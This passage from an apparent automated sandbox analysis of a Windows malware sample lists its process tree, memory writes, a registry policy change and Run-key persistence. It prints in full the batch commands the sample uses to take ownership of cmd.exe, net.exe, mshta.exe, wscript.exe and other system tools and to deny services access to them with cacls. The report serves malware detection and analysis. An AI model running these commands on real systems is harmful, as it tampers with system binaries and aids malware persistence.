22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 1184 wrote to memory of 3920 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 3920 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 3920 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 4488 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4488 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4488 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 5112 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 5112 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 5112 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 5088 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 5088 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 5088 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 3596 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 3596 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 3596 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 4436 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4436 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4436 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4668 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 4668 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 4668 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 4732 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4732 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 4732 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 1012 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 1012 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 1012 1184 cmd.exe cmd.exe PID 1184 wrote to memory of 1016 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 1016 1184 cmd.exe cacls.exe PID 1184 wrote to memory of 1016 1184 cmd.exe cacls.exe PID 5036 wrote to memory of 252 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 252 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 252 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 208 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 208 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 208 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 1608 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 1608 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 5036 wrote to memory of 1608 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe"C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress3⤵
-
